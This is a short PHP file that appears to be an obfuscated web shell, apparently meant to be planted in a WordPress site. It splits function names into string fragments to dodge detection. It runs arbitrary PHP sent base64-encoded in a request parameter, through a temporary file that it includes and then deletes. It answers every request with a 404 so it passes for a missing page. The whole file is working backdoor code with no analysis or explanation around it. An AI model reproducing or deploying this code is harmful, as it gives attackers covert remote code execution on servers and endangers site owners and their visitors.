<?php
try{
$qb0ed2=array('sys_get_t'.'emp_dir','array_key_e'.'xists','base64_dec'.'ode','temp'.'nam','un'.'link','file_pu'.'t_contents');
$cd015d='0e5'.'c2e07';
if($qb0ed2[1]($cd015d,$_POST)){
$j97cd6=$qb0ed2[2]($_POST[$cd015d]);
}elseif($qb0ed2[1]($cd015d,$_GET)){
$j97cd6=$qb0ed2[2]($_GET[$cd015d]);
}else{$j97cd6=null;}
if($j97cd6){
$zba33b=$qb0ed2[3]($qb0ed2[0](),'w'.'p_');
if($zba33b){
$qb0ed2[5]($zba33b,'<'.'?ph'.'p '.$j97cd6);
http_response_code(404);
@include_once($zba33b);
@$qb0ed2[4]($zba33b);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
